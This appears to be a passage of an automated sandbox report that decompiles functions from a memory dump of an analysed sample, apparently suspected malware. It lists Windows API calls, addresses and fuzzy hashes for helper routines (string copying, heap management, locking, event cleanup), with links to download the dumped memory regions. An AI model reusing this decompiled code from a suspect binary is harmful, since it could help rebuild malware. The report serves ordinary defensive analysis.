                                                                                                                                                                                                                        • Associated: 00000001.00000002.925389502.00000000026FD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925395826.00000000026FF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CreateEvent$CloseHandlememset
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2812548120-0
                                                                                                                                                                                                                        • Opcode ID: 16140bfc2c30a1c311d98bdd463d5a08c67106978cb6d5972ee41d07ed266cf2
                                                                                                                                                                                                                        • Instruction ID: d382c816a14a54de2298efa87a3e16afeb1068eb1e33c349bbcc1fe5c2952c7e
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 16140bfc2c30a1c311d98bdd463d5a08c67106978cb6d5972ee41d07ed266cf2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 10F082B150430CBFD750AF66DCC4C2BFBACFB42298B11892FF64692501C672EC158A70
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 68%
                                                                                                                                                                                                                        			E026F6555(int __eax, char _a4) {
                                                                                                                                                                                                                        				void* _v0;
                                                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                                                        				int _t13;
                                                                                                                                                                                                                        				int _t14;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_t1 =  &_a4; // 0x4d283a53
                                                                                                                                                                                                                        				_t14 = __eax;
                                                                                                                                                                                                                        				__imp__( *_t1);
                                                                                                                                                                                                                        				_t13 = __eax;
                                                                                                                                                                                                                        				if(__eax > __eax) {
                                                                                                                                                                                                                        					_t14 = __eax;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				_t2 = _t14 + 1; // 0x1
                                                                                                                                                                                                                        				_t12 = E026F6D10(_t2);
                                                                                                                                                                                                                        				if(_t12 != 0) {
                                                                                                                                                                                                                        					memcpy(_t12, _v0, _t13);
                                                                                                                                                                                                                        					memset(_t12 + _t13, 0, _t14 - _t13 + 1);
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				return _t12;
                                                                                                                                                                                                                        			}







                                                                                                                                                                                                                        0x026f6558
                                                                                                                                                                                                                        0x026f655c
                                                                                                                                                                                                                        0x026f655e
                                                                                                                                                                                                                        0x026f6564
                                                                                                                                                                                                                        0x026f6568
                                                                                                                                                                                                                        0x026f656a
                                                                                                                                                                                                                        0x026f656a
                                                                                                                                                                                                                        0x026f656c
                                                                                                                                                                                                                        0x026f6575
                                                                                                                                                                                                                        0x026f6579
                                                                                                                                                                                                                        0x026f6581
                                                                                                                                                                                                                        0x026f6590
                                                                                                                                                                                                                        0x026f6595
                                                                                                                                                                                                                        0x026f659d

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • lstrlen.KERNEL32(S:(M,00000000,7656D3B0,?,026FA3DD,00000000,00000005,026FD00C,00000008,?,?,59935A40,?,?,59935A40), ref: 026F655E
                                                                                                                                                                                                                        • memcpy.NTDLL(00000000,?,00000000,00000001,?,?,?,026F2018,?,?,?,4D283A53,?,?), ref: 026F6581
                                                                                                                                                                                                                        • memset.NTDLL ref: 026F6590
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925371401.00000000026F1000.00000020.00000001.sdmp, Offset: 026F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925367413.00000000026F0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925384883.00000000026FC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925389502.00000000026FD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925395826.00000000026FF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrlenmemcpymemset
                                                                                                                                                                                                                        • String ID: S:(M
                                                                                                                                                                                                                        • API String ID: 4042389641-2217774225
                                                                                                                                                                                                                        • Opcode ID: cc0c5604fb6b6fe756cb58a0c6c8441f3973e2307ea32c1091bac5e866edaa1a
                                                                                                                                                                                                                        • Instruction ID: bbf2dadae414161d8031ab2a2880d441145cf0df29fca1c4b7e98abe4bdbe275
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cc0c5604fb6b6fe756cb58a0c6c8441f3973e2307ea32c1091bac5e866edaa1a
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A7E065B390531527CF70A9B99C88D4F7AADDBC9650B000929FF15D7204D661C9148AB4
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 50%
                                                                                                                                                                                                                        			E026F4FDC(void** __esi) {
                                                                                                                                                                                                                        				char* _v0;
                                                                                                                                                                                                                        				intOrPtr _t4;
                                                                                                                                                                                                                        				intOrPtr _t6;
                                                                                                                                                                                                                        				void* _t8;
                                                                                                                                                                                                                        				intOrPtr _t11;
                                                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                                                        				void** _t14;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_t14 = __esi;
                                                                                                                                                                                                                        				_t4 =  *0x26fd324; // 0x4b395b0
                                                                                                                                                                                                                        				__imp__(_t4 + 0x40);
                                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                                        					_t6 =  *0x26fd324; // 0x4b395b0
                                                                                                                                                                                                                        					_t1 = _t6 + 0x58; // 0x0
                                                                                                                                                                                                                        					if( *_t1 == 0) {
                                                                                                                                                                                                                        						break;
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					Sleep(0xa);
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				_t8 =  *_t14;
                                                                                                                                                                                                                        				if(_t8 != 0 && _t8 != 0x26fd030) {
                                                                                                                                                                                                                        					HeapFree( *0x26fd238, 0, _t8);
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				_t14[1] = E026FA5F5(_v0, _t14);
                                                                                                                                                                                                                        				_t11 =  *0x26fd324; // 0x4b395b0
                                                                                                                                                                                                                        				_t12 = _t11 + 0x40;
                                                                                                                                                                                                                        				__imp__(_t12);
                                                                                                                                                                                                                        				return _t12;
                                                                                                                                                                                                                        			}










                                                                                                                                                                                                                        0x026f4fdc
                                                                                                                                                                                                                        0x026f4fdc
                                                                                                                                                                                                                        0x026f4fe5
                                                                                                                                                                                                                        0x026f4ff5
                                                                                                                                                                                                                        0x026f4ff5
                                                                                                                                                                                                                        0x026f4ffa
                                                                                                                                                                                                                        0x026f4fff
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f4fef
                                                                                                                                                                                                                        0x026f4fef
                                                                                                                                                                                                                        0x026f5001
                                                                                                                                                                                                                        0x026f5005
                                                                                                                                                                                                                        0x026f5017
                                                                                                                                                                                                                        0x026f5017
                                                                                                                                                                                                                        0x026f5027
                                                                                                                                                                                                                        0x026f502a
                                                                                                                                                                                                                        0x026f502f
                                                                                                                                                                                                                        0x026f5033
                                                                                                                                                                                                                        0x026f5039

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • RtlEnterCriticalSection.NTDLL(04B39570), ref: 026F4FE5
                                                                                                                                                                                                                        • Sleep.KERNEL32(0000000A,?,?,?,026F2018,?,?,?,4D283A53,?,?), ref: 026F4FEF
                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,?,?,?,026F2018,?,?,?,4D283A53,?,?), ref: 026F5017
                                                                                                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(04B39570), ref: 026F5033
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925371401.00000000026F1000.00000020.00000001.sdmp, Offset: 026F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925367413.00000000026F0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925384883.00000000026FC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925389502.00000000026FD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925395826.00000000026FF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 58946197-0
                                                                                                                                                                                                                        • Opcode ID: 77b64830b863136c533978bde4e55255fd97c913e7395abaa00ed13bf42f32d5
                                                                                                                                                                                                                        • Instruction ID: 6fc80fd0268a544506a060a76c7623a637b388aafe2d966d3c9790d720e109f3
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 77b64830b863136c533978bde4e55255fd97c913e7395abaa00ed13bf42f32d5
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D5F05E71A412809BDF90CF68D948F0E37E4AF15709B015809F706C7A41C730E8A1DF65
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                        			E026F6DA6() {
                                                                                                                                                                                                                        				void* _t1;
                                                                                                                                                                                                                        				intOrPtr _t5;
                                                                                                                                                                                                                        				void* _t6;
                                                                                                                                                                                                                        				void* _t7;
                                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_t1 =  *0x26fd26c; // 0x2c4
                                                                                                                                                                                                                        				if(_t1 == 0) {
                                                                                                                                                                                                                        					L8:
                                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				SetEvent(_t1);
                                                                                                                                                                                                                        				_t11 = 0x7fffffff;
                                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                                        					SleepEx(0x64, 1);
                                                                                                                                                                                                                        					_t5 =  *0x26fd2b8; // 0x0
                                                                                                                                                                                                                        					if(_t5 == 0) {
                                                                                                                                                                                                                        						break;
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					_t11 = _t11 - 0x64;
                                                                                                                                                                                                                        					if(_t11 > 0) {
                                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					break;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				_t6 =  *0x26fd26c; // 0x2c4
                                                                                                                                                                                                                        				if(_t6 != 0) {
                                                                                                                                                                                                                        					CloseHandle(_t6);
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				_t7 =  *0x26fd238; // 0x4740000
                                                                                                                                                                                                                        				if(_t7 != 0) {
                                                                                                                                                                                                                        					HeapDestroy(_t7);
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				goto L8;
                                                                                                                                                                                                                        			}








                                                                                                                                                                                                                        0x026f6da6
                                                                                                                                                                                                                        0x026f6dad
                                                                                                                                                                                                                        0x026f6df7
                                                                                                                                                                                                                        0x026f6df9
                                                                                                                                                                                                                        0x026f6df9
                                                                                                                                                                                                                        0x026f6db1
                                                                                                                                                                                                                        0x026f6db7
                                                                                                                                                                                                                        0x026f6dbc
                                                                                                                                                                                                                        0x026f6dc0
                                                                                                                                                                                                                        0x026f6dc6
                                                                                                                                                                                                                        0x026f6dcd
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f6dcf
                                                                                                                                                                                                                        0x026f6dd4
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f6dd4
                                                                                                                                                                                                                        0x026f6dd6
                                                                                                                                                                                                                        0x026f6dde
                                                                                                                                                                                                                        0x026f6de1
                                                                                                                                                                                                                        0x026f6de1
                                                                                                                                                                                                                        0x026f6de7
                                                                                                                                                                                                                        0x026f6dee
                                                                                                                                                                                                                        0x026f6df1
                                                                                                                                                                                                                        0x026f6df1
                                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • SetEvent.KERNEL32(000002C4,00000001,026F2228), ref: 026F6DB1
                                                                                                                                                                                                                        • SleepEx.KERNEL32(00000064,00000001), ref: 026F6DC0
                                                                                                                                                                                                                        • CloseHandle.KERNEL32(000002C4), ref: 026F6DE1
                                                                                                                                                                                                                        • HeapDestroy.KERNEL32(04740000), ref: 026F6DF1
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925371401.00000000026F1000.00000020.00000001.sdmp, Offset: 026F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925367413.00000000026F0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925384883.00000000026FC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925389502.00000000026FD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925395826.00000000026FF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseDestroyEventHandleHeapSleep
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4109453060-0
                                                                                                                                                                                                                        • Opcode ID: b70f55d3260d348eb0aac5d6a00f93008d54b6a3ffd9e122f7d02417b756eaf2
                                                                                                                                                                                                                        • Instruction ID: 1212643807eb03e877aeef16136082d6316c1635481bbf6037c89fd3f70d1954
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b70f55d3260d348eb0aac5d6a00f93008d54b6a3ffd9e122f7d02417b756eaf2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 11F0A072E8131297DFD0AB3AE88CA5E7BACAB05650B041911BF20D37C0CB31D49099A0
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 37%
                                                                                                                                                                                                                        			E026F6B92() {
                                                                                                                                                                                                                        				void* _v0;
                                                                                                                                                                                                                        				void** _t3;
                                                                                                                                                                                                                        				void** _t5;
                                                                                                                                                                                                                        				void** _t7;
                                                                                                                                                                                                                        				void** _t8;
                                                                                                                                                                                                                        				void* _t10;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_t3 =  *0x26fd324; // 0x4b395b0
                                                                                                                                                                                                                        				__imp__( &(_t3[0x10]));
                                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                                        					_t5 =  *0x26fd324; // 0x4b395b0
                                                                                                                                                                                                                        					_t1 =  &(_t5[0x16]); // 0x0
                                                                                                                                                                                                                        					if( *_t1 == 0) {
                                                                                                                                                                                                                        						break;
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					Sleep(0xa);
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				_t7 =  *0x26fd324; // 0x4b395b0
                                                                                                                                                                                                                        				_t10 =  *_t7;
                                                                                                                                                                                                                        				if(_t10 != 0 && _t10 != 0x26fe845) {
                                                                                                                                                                                                                        					HeapFree( *0x26fd238, 0, _t10);
                                                                                                                                                                                                                        					_t7 =  *0x26fd324; // 0x4b395b0
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				 *_t7 = _v0;
                                                                                                                                                                                                                        				_t8 =  &(_t7[0x10]);
                                                                                                                                                                                                                        				__imp__(_t8);
                                                                                                                                                                                                                        				return _t8;
                                                                                                                                                                                                                        			}









                                                                                                                                                                                                                        0x026f6b92
                                                                                                                                                                                                                        0x026f6b9b
                                                                                                                                                                                                                        0x026f6bab
                                                                                                                                                                                                                        0x026f6bab
                                                                                                                                                                                                                        0x026f6bb0
                                                                                                                                                                                                                        0x026f6bb5
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f6ba5
                                                                                                                                                                                                                        0x026f6ba5
                                                                                                                                                                                                                        0x026f6bb7
                                                                                                                                                                                                                        0x026f6bbc
                                                                                                                                                                                                                        0x026f6bc0
                                                                                                                                                                                                                        0x026f6bd3
                                                                                                                                                                                                                        0x026f6bd9
                                                                                                                                                                                                                        0x026f6bd9
                                                                                                                                                                                                                        0x026f6be2
                                                                                                                                                                                                                        0x026f6be4
                                                                                                                                                                                                                        0x026f6be8
                                                                                                                                                                                                                        0x026f6bee

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • RtlEnterCriticalSection.NTDLL(04B39570), ref: 026F6B9B
                                                                                                                                                                                                                        • Sleep.KERNEL32(0000000A,?,?,?,026F2018,?,?,?,4D283A53,?,?), ref: 026F6BA5
                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,026F2018,?,?,?,4D283A53,?,?), ref: 026F6BD3
                                                                                                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(04B39570), ref: 026F6BE8
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925371401.00000000026F1000.00000020.00000001.sdmp, Offset: 026F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925367413.00000000026F0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925384883.00000000026FC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925389502.00000000026FD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925395826.00000000026FF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 58946197-0
                                                                                                                                                                                                                        • Opcode ID: 385c01c7e3f9bc608283039a537a11d93ca81eeddd62f33630d708028566e056
                                                                                                                                                                                                                        • Instruction ID: 2e73fe8ac07319508c02a84f3d0310e222c690505e60a10523609bcc0b8290a8
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 385c01c7e3f9bc608283039a537a11d93ca81eeddd62f33630d708028566e056
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F4F0D475E802449FEF98CB24D999F1D37E9EB19305B055809EB12DB7A0C731A8B2CA60
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                                                                                                        			E026F4F14(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                        				intOrPtr* _v8;
                                                                                                                                                                                                                        				void* _t17;
                                                                                                                                                                                                                        				intOrPtr* _t22;
                                                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                                                        				char* _t30;
                                                                                                                                                                                                                        				void* _t33;
                                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                                        				void* _t36;
                                                                                                                                                                                                                        				void* _t37;
                                                                                                                                                                                                                        				void* _t39;
                                                                                                                                                                                                                        				int _t42;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_t17 = __eax;
                                                                                                                                                                                                                        				_t37 = 0;
                                                                                                                                                                                                                        				__imp__(_a4, _t33, _t36, _t27, __ecx);
                                                                                                                                                                                                                        				_t2 = _t17 + 1; // 0x1
                                                                                                                                                                                                                        				_t28 = _t2;
                                                                                                                                                                                                                        				_t34 = E026F6D10(_t2);
                                                                                                                                                                                                                        				if(_t34 != 0) {
                                                                                                                                                                                                                        					_t30 = E026F6D10(_t28);
                                                                                                                                                                                                                        					if(_t30 == 0) {
                                                                                                                                                                                                                        						E026F45B3(_t34);
                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                        						_t39 = _a4;
                                                                                                                                                                                                                        						_t22 = E026FA6E0(_t39);
                                                                                                                                                                                                                        						_v8 = _t22;
                                                                                                                                                                                                                        						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                                                                                                                                                                                                        							_a4 = _t39;
                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                        							_t26 = _t22 + 2;
                                                                                                                                                                                                                        							_a4 = _t22 + 2;
                                                                                                                                                                                                                        							_t22 = E026FA6E0(_t26);
                                                                                                                                                                                                                        							_v8 = _t22;
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						if(_t22 == 0) {
                                                                                                                                                                                                                        							__imp__(_t34, _a4);
                                                                                                                                                                                                                        							 *_t30 = 0x2f;
                                                                                                                                                                                                                        							 *((char*)(_t30 + 1)) = 0;
                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                        							_t42 = _t22 - _a4;
                                                                                                                                                                                                                        							memcpy(_t34, _a4, _t42);
                                                                                                                                                                                                                        							 *((char*)(_t34 + _t42)) = 0;
                                                                                                                                                                                                                        							__imp__(_t30, _v8);
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						 *_a8 = _t34;
                                                                                                                                                                                                                        						_t37 = 1;
                                                                                                                                                                                                                        						 *_a12 = _t30;
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				return _t37;
                                                                                                                                                                                                                        			}














                                                                                                                                                                                                                        0x026f4f14
                                                                                                                                                                                                                        0x026f4f1e
                                                                                                                                                                                                                        0x026f4f20
                                                                                                                                                                                                                        0x026f4f26
                                                                                                                                                                                                                        0x026f4f26
                                                                                                                                                                                                                        0x026f4f2f
                                                                                                                                                                                                                        0x026f4f33
                                                                                                                                                                                                                        0x026f4f3f
                                                                                                                                                                                                                        0x026f4f43
                                                                                                                                                                                                                        0x026f4fb7
                                                                                                                                                                                                                        0x026f4f45
                                                                                                                                                                                                                        0x026f4f45
                                                                                                                                                                                                                        0x026f4f49
                                                                                                                                                                                                                        0x026f4f4e
                                                                                                                                                                                                                        0x026f4f53
                                                                                                                                                                                                                        0x026f4f6d
                                                                                                                                                                                                                        0x026f4f5c
                                                                                                                                                                                                                        0x026f4f5c
                                                                                                                                                                                                                        0x026f4f60
                                                                                                                                                                                                                        0x026f4f63
                                                                                                                                                                                                                        0x026f4f68
                                                                                                                                                                                                                        0x026f4f68
                                                                                                                                                                                                                        0x026f4f72
                                                                                                                                                                                                                        0x026f4f9a
                                                                                                                                                                                                                        0x026f4fa0
                                                                                                                                                                                                                        0x026f4fa3
                                                                                                                                                                                                                        0x026f4f74
                                                                                                                                                                                                                        0x026f4f76
                                                                                                                                                                                                                        0x026f4f7e
                                                                                                                                                                                                                        0x026f4f89
                                                                                                                                                                                                                        0x026f4f8e
                                                                                                                                                                                                                        0x026f4f8e
                                                                                                                                                                                                                        0x026f4faa
                                                                                                                                                                                                                        0x026f4fb1
                                                                                                                                                                                                                        0x026f4fb2
                                                                                                                                                                                                                        0x026f4fb2
                                                                                                                                                                                                                        0x026f4f43
                                                                                                                                                                                                                        0x026f4fc2

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,00000008,?,73B74D40,?,?,026F3F7D,?,?,?,?,00000102,026F519D,?,?,73BB81D0), ref: 026F4F20
                                                                                                                                                                                                                          • Part of subcall function 026F6D10: RtlAllocateHeap.NTDLL(00000000,-00000008,026F5D29), ref: 026F6D1C
                                                                                                                                                                                                                          • Part of subcall function 026FA6E0: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,026F4F4E,00000000,00000001,00000001,?,?,026F3F7D,?,?,?,?,00000102), ref: 026FA6EE
                                                                                                                                                                                                                          • Part of subcall function 026FA6E0: StrChrA.SHLWAPI(?,0000003F,?,?,026F3F7D,?,?,?,?,00000102,026F519D,?,?,73BB81D0,00000000), ref: 026FA6F8
                                                                                                                                                                                                                        • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,026F3F7D,?,?,?,?,00000102,026F519D,?), ref: 026F4F7E
                                                                                                                                                                                                                        • lstrcpy.KERNEL32(00000000,00000000), ref: 026F4F8E
                                                                                                                                                                                                                        • lstrcpy.KERNEL32(00000000,00000000), ref: 026F4F9A
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925371401.00000000026F1000.00000020.00000001.sdmp, Offset: 026F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925367413.00000000026F0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925384883.00000000026FC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925389502.00000000026FD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925395826.00000000026FF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3767559652-0
                                                                                                                                                                                                                        • Opcode ID: 43770fcaad1620040efd45b9d7c004bedf8f1e47078f144e8fd8e2657fa890ce
                                                                                                                                                                                                                        • Instruction ID: 1ff1f4a010f105e6ab2ba1e23896d081f32ee073e37a760b3e9f5e8131a75429
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 43770fcaad1620040efd45b9d7c004bedf8f1e47078f144e8fd8e2657fa890ce
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 05217272505256AFCF52AFB4C844AAFBFE99F46284B164059FB089B301DB35C951CBE0
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                        			E026F241A(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                                        				void* _t18;
                                                                                                                                                                                                                        				int _t25;
                                                                                                                                                                                                                        				int _t29;
                                                                                                                                                                                                                        				int _t34;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_t29 = lstrlenW(_a4);
                                                                                                                                                                                                                        				_t25 = lstrlenW(_a8);
                                                                                                                                                                                                                        				_t18 = E026F6D10(_t25 + _t29 + _t25 + _t29 + 2);
                                                                                                                                                                                                                        				_v8 = _t18;
                                                                                                                                                                                                                        				if(_t18 != 0) {
                                                                                                                                                                                                                        					_t34 = _t29 + _t29;
                                                                                                                                                                                                                        					memcpy(_t18, _a4, _t34);
                                                                                                                                                                                                                        					_t10 = _t25 + 2; // 0x2
                                                                                                                                                                                                                        					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				return _v8;
                                                                                                                                                                                                                        			}








                                                                                                                                                                                                                        0x026f242f
                                                                                                                                                                                                                        0x026f2433
                                                                                                                                                                                                                        0x026f243d
                                                                                                                                                                                                                        0x026f2442
                                                                                                                                                                                                                        0x026f2447
                                                                                                                                                                                                                        0x026f2449
                                                                                                                                                                                                                        0x026f2451
                                                                                                                                                                                                                        0x026f2456
                                                                                                                                                                                                                        0x026f2464
                                                                                                                                                                                                                        0x026f2469
                                                                                                                                                                                                                        0x026f2473

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • lstrlenW.KERNEL32(004F0053,?,73B75520,00000008,04B3934C,?,026F6AFE,004F0053,04B3934C,?,?,?,?,?,?,026F61D1), ref: 026F242A
                                                                                                                                                                                                                        • lstrlenW.KERNEL32(026F6AFE,?,026F6AFE,004F0053,04B3934C,?,?,?,?,?,?,026F61D1), ref: 026F2431
                                                                                                                                                                                                                          • Part of subcall function 026F6D10: RtlAllocateHeap.NTDLL(00000000,-00000008,026F5D29), ref: 026F6D1C
                                                                                                                                                                                                                        • memcpy.NTDLL(00000000,004F0053,73B769A0,?,?,026F6AFE,004F0053,04B3934C,?,?,?,?,?,?,026F61D1), ref: 026F2451
                                                                                                                                                                                                                        • memcpy.NTDLL(73B769A0,026F6AFE,00000002,00000000,004F0053,73B769A0,?,?,026F6AFE,004F0053,04B3934C), ref: 026F2464
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925371401.00000000026F1000.00000020.00000001.sdmp, Offset: 026F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925367413.00000000026F0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925384883.00000000026FC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925389502.00000000026FD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925395826.00000000026FF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrlenmemcpy$AllocateHeap
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2411391700-0
                                                                                                                                                                                                                        • Opcode ID: c5bc7688a7f55e25867962935ef7dbf4e020fa94d7aa255a225b68b56a1f3ff9
                                                                                                                                                                                                                        • Instruction ID: fa18165b0ed11997b8d3bc6b2484435292067a9cbf23e0a612003978133ad071
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c5bc7688a7f55e25867962935ef7dbf4e020fa94d7aa255a225b68b56a1f3ff9
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7AF03C32900118BB8F11EFE9CC88C9FBBADEF092547154466BE0897201E675EE108BA4
                                                                                                                                                                                                                        Uniqueness

